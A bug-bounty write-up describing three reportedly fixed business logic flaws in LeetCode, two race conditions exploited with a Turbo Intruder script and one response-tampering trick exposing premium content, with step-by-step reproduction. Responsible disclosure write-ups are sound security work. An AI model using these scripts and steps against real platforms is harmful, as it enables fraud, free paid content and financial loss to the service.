From Coins to Chaos : Business Logic Exploits in LeetCode

write-ups · 28 May 2024

While most people use LeetCode to sharpen their problem-solving skills, I took a different route—digging into its logic. In this blog, I’ll walk you through how I found and responsibly reported three impactful business logic vulnerabilities in LeetCode’s main application - leetcode.com. Each case involved clever misuse of logic, and none required complex technical exploits. Just pure understanding of how things shouldn’t work.

🧩 Case 1: Infinite Redemptions with Limited LeetCoins

📌 Description

LeetCode offers a store where users can redeem items using “leetcoins.” Logically, if you have 70 leetcoins, you should only be able to redeem one item worth that amount. But due to race condition vulnerabilities, I was able to redeem multiple items with the same coin balance.

💥 Exploit Summary

By intercepting the redemption request and launching it concurrently using Turbo Intruder, I was able to bypass redemption limits.

🛠 Steps to Reproduce

Start with 70 leetcoins.
Intercept the redemption request via any proxy tools.
Send it to Turbo Intruder with this script:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=50,
                           requestsPerConnection=50,
                           pipeline=False)

    for i in range(50):
        engine.queue(target.req, target.baseInput, gate='race1')

    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Execute and observe—multiple items get redeemed.

🎯 Impact

Bypasses monthly limits (e.g. more than 3 time-travel tickets).
Can be extended to perks or premium subscriptions.
Financial implications for LeetCode.

🔓 Case 2: Free Access to Premium Content

📌 Description

LeetCode offers premium problems with paid access. However, using a clever frontend trick, I was able to access premium descriptions, discussions, and solutions.

🛠 Steps to Reproduce

Use a non-premium account.
Visit any premium problem (e.g. Word-Squares).
Intercept and modify the response—set all parameters to true except "isPaidOnly": false.
To reveal the problem description: Add a note to the problem.
Go to your notes section and enable “Show Description.”

🎯 Impact

Unauthorized viewing of premium content.
Could lead to public leaks and financial damage.
Involves only frontend manipulation—no backend auth.

🪙 Case 3: Free LeetCoins via Profile Update Race Condition

📌 Description

By editing basic profile info (like name or gender) concurrently, I triggered a condition where the application granted leetcoins multiple times for a single update.

🛠 Steps to Reproduce

Create a LeetCode account.
Go to the Edit Profile section.
Intercept the request and send it to Turbo Intruder.
Use this script:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=50,
                           requestsPerConnection=50,
                           pipeline=False)

    for i in range(50):
        engine.queue(target.req, target.baseInput, gate='race1')

    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Set HTTP/1.1 to HTTP/1.0 and mark %s appropriately.
Execute and refresh the profile page —> extra coins added.

🎯 Impact

Generation of coins beyond permitted logic.
Can be used to buy perks or affect user rankings.
Again, financial damage for the platform.

🔍 Takeaways

Business logic flaws are powerful. They exploit what the app allows—not what it protects.
Race conditions can occur in unexpected places. Backend validation is a must.
Always check what a user is allowed to do logically, not just technically.

TimeLine

Cases Submission - 23-May-2024
Reports Triaged - 28-May-2024
Resolution - 07-Oct-2024

My Personal thought to LeetCode and Security Researchers …

For Security Researchers : Please do not try to perform security research on leetcode infrastructure. My overall experience with this team is horrible and they offer leetcoins as a return of your investment. So don’t expect anything in return.
For LeetCode : Very unprofessional - Dev/Sec Team take huge time to resolve a case (~ 6 months) , Company did not offer any LoA, Swags or anything to security researcher who helped them from a major financial loss. If I want, I can mine millions of leetcoins easily and make a lot of money by unethically selling them or redeeming any swags/goodies, well it’s leetcode…!! (Very Disappointing)